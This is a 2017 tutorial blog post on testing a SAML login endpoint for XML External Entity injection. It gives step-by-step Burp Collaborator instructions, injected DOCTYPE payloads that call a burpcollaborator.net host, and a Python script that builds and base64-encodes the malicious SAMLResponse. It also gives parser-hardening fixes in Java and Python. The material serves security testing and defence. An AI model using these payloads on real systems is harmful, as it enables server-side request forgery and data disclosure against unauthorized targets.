Friday, January 13, 2017

SAML Security XML External Entity Attack

XML External Entity (XXE) attack in a SAML-based SSO application

An XML External Entity (XXE) attack targets an application that parses XML input. It occurs when XML containing a reference to an external entity is processed by a weakly configured XML parser. The impact ranges from disclosure of confidential data and denial of service to server-side request forgery and port scanning from the perspective of the machine where the parser runs. A SAML service provider is a natural target: it base64-decodes the SAMLResponse parameter and hands the result straight to an XML parser, and the entity is resolved while the document is being parsed, before any signature or schema check can reject it.

We need a Collaborator server, an external host under our control, so that the XML we insert can point an entity at a URL (or a file location) and we can see whether the target's parser fetches it. The Collaborator server does nothing except record every DNS lookup and HTTP request that reaches it; if a request from the company's IP address shows up there, the parser on the target resolved our entity.

We also need the SAML Raider extension to capture and decode the SAML response when the request carries SAML content. SAML Raider is available in Burp Professional's BApp Store (Extender tab -> BApp Store), and it can also be installed from its jar for your Burp version via Extender tab -> Extensions tab -> Add -> load the jar.


Suppose our affected URL is: https://testcompany.com/saml.html

The URL above is the login endpoint; an HTML page supplied by the SSO provider (say test.html) posts a SAML response to it.

Suppose test.html has the source below. It has only a submit button and a hidden parameter; clicking the button logs the user in using the SAMLResponse parameter.
Our aim is to tamper with the SAMLResponse value so that the target server makes a request to a server it never intended to contact.

<html><body>
<form method="POST" action="https://testcompany.com/saml.shtml">
<input type="hidden" name="SAMLResponse" value="aGVtYSIgeG1sbnM6eHNpPSJodHRwOi8vd3d3LnczLm" />
<input type="submit" name="Post Saml Response" value="Post Saml Response"/>
</form>
</body></html>

Step 1: Download Burp (we need Burp Professional for this, since Collaborator is not in the free edition).
Step 2: Open Burp and click the Project options tab.
Step 3: Under Misc -> Burp Collaborator Server, use the default Collaborator server.
Step 4: Click "Run health check" to confirm that the default Collaborator server is reachable from your machine.
Step 5: Open the Burp menu and click Burp Collaborator client.
Step 6: Intercept the login request through the Burp proxy and send it to Repeater. The request editor now has a SAML Raider tab; copy the decoded SAML response from it. The SAML response is an XML document.

Step 7: Now we have to send our malicious XML, inside the SAML response, to the target URL.

For example, the intruder's XML is:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://Collaborator Server's URL" >]>

<foo>&xxe;</foo>

Step 8: To test whether the affected server really makes a request to the intruder's server, we use the default Collaborator server as the intruder's server.
Step 9: To get the Collaborator server URL, go to the Burp Collaborator client and click "Copy to clipboard". It copies a unique hostname that looks something like 10pn7ed51u.burpcollaborator.net.
Now replace the placeholder in the XML chunk used for the attack with that hostname (make sure no trailing space ends up inside the quoted SYSTEM literal, or the URL will never resolve). The XML will now look like this:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://10pn7ed51u.burpcollaborator.net" >]>

<foo>&xxe;</foo>


Now insert our SAML response between the <foo> and </foo> tags and post the SAML response.

For example, the intruder's new XML, ready for the attack, will look like the document below; the burpcollaborator.net hostname in the DOCTYPE is the one acting as the intruder's URL. Note that wrapping the response in <foo> makes foo the document root, so the service provider will not accept the document as a SAML response once parsing finishes. That does not matter for the test: the external entity is resolved while the parser reads the document, before any root-element, schema or signature check, so a Collaborator hit still proves the parser is vulnerable. If you want a payload that also survives a root-element check, put the DOCTYPE directly above <samlp:Response> and place &xxe; just inside it instead.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://10pn7ed51u.burpcollaborator.net" >]>

<foo>&xxe;
<samlp:Response ID="d4_kS-guM6wiWqkSLdWESYZ8DGv"
  IssueInstant="2016-12-21T19:15:11.418Z" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
  <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">https://www.xyz.com/enterprise-central</saml:Issuer>
  <samlp:Status>
    <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
  </samlp:Status>
  <saml:Assertion ID="YzZoJdNiWwkrRrz3pljoYUvX3Lb"
    IssueInstant="2016-12-21T19:15:11.480Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
    <saml:Issuer>https://www.xyz.com/enterprise-central</saml:Issuer>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
      </ds:SignedInfo>
      <ds:SignatureValue>
      </ds:SignatureValue>
    </ds:Signature>
  </saml:Assertion>
</samlp:Response>
</foo>

The SAML response in the original request was base64 encoded, so now that we have built the new XML with the attack code inserted, copy it and base64-encode it. Use Burp's Decoder tab (or a local tool such as the base64 command) rather than an online encoder: a real SAML response contains the customer's assertion and should not be pasted into a third-party website.

Step 10: Open test.html to log in through SSO, intercept the request with Burp, send it to Repeater, and replace the existing SAMLResponse value in the request body with the newly encoded value (make sure it is URL-encoded, since base64 contains +, / and =). Now send the request.

Step 11: Expected result: a request from our server (testcompany.com) is sent to the unintended server (burpcollaborator.net), because the DOCTYPE we inserted into the POST body references it.

Step 12: We can verify this by clicking "Poll now" in the Burp Collaborator client; it lists the DNS lookups and HTTP requests that reached the Collaborator server, with the IP address of the test company as the source. A DNS lookup alone shows that the parser processed the entity but outbound HTTP may be blocked; an HTTP request shows the fetch completed.

This is how the issue is reproduced.
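As an added worked example (not code from the original post), the script below performs Steps 7 to 10 in Python: it takes the decoded SAML response, prepends the DOCTYPE with the Collaborator hostname, re-encodes the result in base64 and form-encodes the body so it can be pasted into Repeater. It also produces the bare-entity variant described in the Note at the end. The sample response is a constructed, trimmed copy of the one shown above, and 10pn7ed51u.burpcollaborator.net is the post's placeholder hostname, not a live endpoint; nothing here sends traffic.

```python
"""Added example: build the XXE-bearing SAMLResponse from a captured one.

This is not code from the original post. The sample response below is a
constructed, trimmed copy of the one shown in the post, and the hostname is
the post's placeholder Collaborator subdomain, not a live endpoint. Nothing
here sends traffic; the output is pasted into Burp Repeater (Step 10).
"""
import base64
import re
import urllib.parse

# Constructed sample of what SAML Raider shows after decoding the captured POST.
CAPTURED_RESPONSE = b"""<?xml version="1.0" encoding="UTF-8"?>
<samlp:Response ID="d4_kS-guM6wiWqkSLdWESYZ8DGv" Version="2.0"
  IssueInstant="2016-12-21T19:15:11.418Z"
  xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
  <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">https://www.xyz.com/enterprise-central</saml:Issuer>
  <samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status>
</samlp:Response>
"""

_XML_DECL = re.compile(rb"^\s*<\?xml[^>]*\?>\s*")
_ROOT_START = re.compile(rb"<samlp:Response\b[^>]*>")


def build_xxe_payload(saml_xml: bytes, collaborator_host: str, wrap_in_foo: bool = False) -> bytes:
    """Return saml_xml with an external-entity DOCTYPE in front of it.

    collaborator_host is the hostname copied from the Collaborator client; it is
    stripped and validated so that no stray whitespace lands inside the SYSTEM
    literal (the URL would then end in a space and never resolve).

    wrap_in_foo=True reproduces the post's layout: a <foo> root holding &xxe;
    and the Response (pass b"" as saml_xml for the bare-entity variant in the
    Note). wrap_in_foo=False keeps samlp:Response as the root and puts &xxe;
    just inside it, so the document also survives a root-element check.
    """
    host = collaborator_host.strip()
    if not re.fullmatch(r"[A-Za-z0-9.-]+", host):
        raise ValueError("collaborator host must be a bare hostname")
    doctype = (
        b"<!DOCTYPE foo [<!ELEMENT foo ANY >"
        b'<!ENTITY xxe SYSTEM "http://' + host.encode("ascii") + b'" >]>\n'
    )
    # A document may carry only one XML declaration, and it must come first,
    # so drop the captured one and emit our own ahead of the DOCTYPE.
    body = _XML_DECL.sub(b"", saml_xml, count=1)
    head = b'<?xml version="1.0" encoding="UTF-8"?>\n' + doctype
    if wrap_in_foo:
        return head + b"<foo>&xxe;\n" + body + b"</foo>\n"
    m = _ROOT_START.search(body)
    if m is None:
        raise ValueError("no samlp:Response root element found")
    return head + body[: m.end()] + b"&xxe;" + body[m.end():]


def encode_for_post(payload: bytes, relay_state=None) -> str:
    """Base64-encode payload (standard alphabet, like the captured value) and
    form-encode it the way test.html's form does, ready for the Repeater body."""
    fields = {"SAMLResponse": base64.b64encode(payload).decode("ascii")}
    if relay_state is not None:
        fields["RelayState"] = relay_state
    return urllib.parse.urlencode(fields)


def decode_saml_response(form_body: str) -> bytes:
    """Inverse of encode_for_post: what SAML Raider does in the Repeater tab."""
    fields = urllib.parse.parse_qs(form_body, strict_parsing=True)
    return base64.b64decode(fields["SAMLResponse"][0])


if __name__ == "__main__":
    payload = build_xxe_payload(CAPTURED_RESPONSE, "10pn7ed51u.burpcollaborator.net ")
    print(payload.decode())
    print(encode_for_post(payload)[:72] + "...")
```

Paste the string returned by encode_for_post as the whole request body in Repeater (Content-Type application/x-www-form-urlencoded) and send; then poll the Collaborator client as in Step 12.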

How to fix:

The safest way to prevent XXE is always to disable DTDs (and with them external entities) completely. The SAML message a service provider accepts never needs a DTD, so reject any document that declares one. For the Java JAXP parsers (DocumentBuilderFactory or SAXParserFactory) the setting is:

factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

If DTDs cannot be disabled outright, set "http://xml.org/sax/features/external-general-entities" and "http://xml.org/sax/features/external-parameter-entities" to false and "http://apache.org/xml/features/nonvalidating/load-external-dtd" to false. Apply the same configuration to every parser on the SAML path, including the one used for XML signature validation, and verify the setting rather than trusting the library default: the XXE fires during parsing, so a valid signature on the response is no protection.
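The same policy in Python, as an added example that is not code from the original post: any DOCTYPE in the decoded SAMLResponse is refused before a tree is built and before any signature check, which is what the Java disallow-doctype-decl feature quoted above does. It also rejects a DOCTYPE that references an external DTD, a variant the post does not show but which triggers the same out-of-band fetch. ElementTree itself does not fetch external entities, but the explicit rejection makes the behaviour independent of whatever parser sits underneath, which is the point of the fix. The two sample documents are constructed: a trimmed clean Response and the attack document from the post with its placeholder Collaborator hostname.

```python
"""Added example: the fix, in Python, mirroring the Java feature quoted above.

Not code from the original post. A SAML message never needs a DTD, so the
parser refuses any DOCTYPE (the policy behind disallow-doctype-decl) before a
tree is built and before any signature check; an external entity is therefore
never resolved. The two sample documents are constructed: a trimmed clean
Response and the post's attack document with its placeholder Collaborator host.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat

SAMLP_RESPONSE = "{urn:oasis:names:tc:SAML:2.0:protocol}Response"

# Constructed sample: a minimal DTD-free Response the service provider should accept.
CLEAN_RESPONSE = b"""<?xml version="1.0" encoding="UTF-8"?>
<samlp:Response ID="d4_kS-guM6wiWqkSLdWESYZ8DGv" Version="2.0"
  IssueInstant="2016-12-21T19:15:11.418Z"
  xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
  <samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status>
</samlp:Response>
"""

# Constructed sample: the post's attack document (placeholder Collaborator host).
XXE_RESPONSE = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://10pn7ed51u.burpcollaborator.net" >]>
<foo>&xxe;</foo>
"""


class XXERejected(ValueError):
    """The SAMLResponse carried a DOCTYPE or external entity reference."""


def _reject_doctype(doctype_name, system_id, public_id, has_internal_subset):
    # Fires on <!DOCTYPE ...> whether the subset is internal (the post's
    # payload) or an external SYSTEM reference; either way, stop here.
    raise XXERejected(f"DOCTYPE {doctype_name!r} is not allowed in a SAMLResponse")


def _reject_external_entity(context, base, system_id, public_id):
    # Defence in depth: unreachable when the DOCTYPE handler fires first, and
    # raising here makes sure system_id is never fetched if it somehow is.
    raise XXERejected(f"external entity {system_id!r} is not allowed")


def parse_saml_response(xml_bytes: bytes) -> ET.Element:
    """Parse a base64-decoded SAMLResponse with DTD processing refused.

    Pass 1 streams the bytes through expat with handlers that abort on any
    DOCTYPE or external entity reference. Pass 2 builds the ElementTree only
    after pass 1 found the document DTD-free, then checks the root element.
    """
    parser = xml.parsers.expat.ParserCreate()
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartDoctypeDeclHandler = _reject_doctype
    parser.ExternalEntityRefHandler = _reject_external_entity
    try:
        parser.Parse(xml_bytes, True)
    except xml.parsers.expat.ExpatError as e:
        raise ValueError(f"malformed SAMLResponse: {e}") from e
    root = ET.fromstring(xml_bytes)
    if root.tag != SAMLP_RESPONSE:
        raise ValueError(f"unexpected root element {root.tag}")
    return root


def classify(xml_bytes: bytes) -> str:
    """Outcome label for a decoded SAMLResponse: accepted, xxe-rejected or rejected."""
    try:
        parse_saml_response(xml_bytes)
        return "accepted"
    except XXERejected:
        return "xxe-rejected"
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    print("clean:", classify(CLEAN_RESPONSE))
    print("attack:", classify(XXE_RESPONSE))
```

Run the decoded SAMLResponse through parse_saml_response before anything else touches it; the attack document from the post is rejected at the DOCTYPE, so no request ever leaves for the Collaborator host.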


Note: a quicker variant without the SAML response.
Delete the SAML response, take the intruder's XML on its own and replace the server name with the Collaborator client hostname.
Base64-encode the XML (Burp Decoder or a local tool).
Paste the encoded XML as the value of the POST parameter named "SAMLResponse".
Click Go.
If the parser is vulnerable, the Collaborator server receives a request from the host where we posted our request, even though the document is not a SAML response at all.


References:

https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet

https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
